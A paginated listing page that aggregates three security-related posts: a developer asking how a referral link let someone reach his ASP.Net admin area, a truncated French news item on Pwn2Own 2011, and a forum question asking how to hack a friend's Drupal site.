    I had a rather interesting case of hacking on my ASP.Net MVC website. For this website I had implemented a rather uncomplicated authentication system for my admin area -- an encrypted cookie which had an identifying signature for the member. Whenever the admin visits the website the cookie would be decrypted and signature verified. If matching he wouldn't have to sign in. Couple of days ago a visitor on my site told me that he was able to sign into my website simply by clicking no a referral link on his Statcounter console which pointed to my admin area (I had visited his site from a link inside my admin view). He just clicked on a link in statcounter and he was signed in as the admin! The only way this could have happened was if statcounter somehow recorded my cookies and used those when he clicked on the link pointing to my admin! Is that logical or fathomable? I don't understand what's going on. Do you have any suggestions as to how I can protect my website against things like this?

    Read the article

  • Pwn2Own 2011 : BlackBerry et l'iPhone 4 vaincus lors du concours de hacking, les produits Google demeurent intouchés

    Pwn2Own 2011 : BlackBerry et l'iPhone 4 vaincus lors du concours de hacking, les produits Google demeurent intouchés Mise à jour du 11.03.2011 par Katleen Pour sa deuxième journée, le Pwn2Own a encore fait quelques victimes, mais en a aussi épargné certains. Les victimes potentielles de la journée étaient les systèmes d'exploitation mobile mais aussi Firefox (3.6), le navigateur qui n'avait pas été malmené hier. Seulement, Sam Dash, qui devait lui régler son compte, ne s'est pas présenté au concours. "Je ne peux pas écrire une code d'exploitation viable" pour ce challenge, s'est-il justifié. En revanche, l'iPhone 4 et le BlackBerry Torch sont tombés. Pour le s...

    Read the article

  • How to hack Drupal

    - by Ryan Nelson
    Does anyone know how to hack into a Drupal site? This is for ethical purposes, just a contest with me and my friend to see who can hack each other the most. He's got a Drupal site I need to get past. Anyone know how? Anything is useful (Gaining admin access, modifying stuff, etc.) Thanks!

    Read the article

< Previous Page | 2 3 4 5 6 7 8 9 10 11 12 13  | Next Page >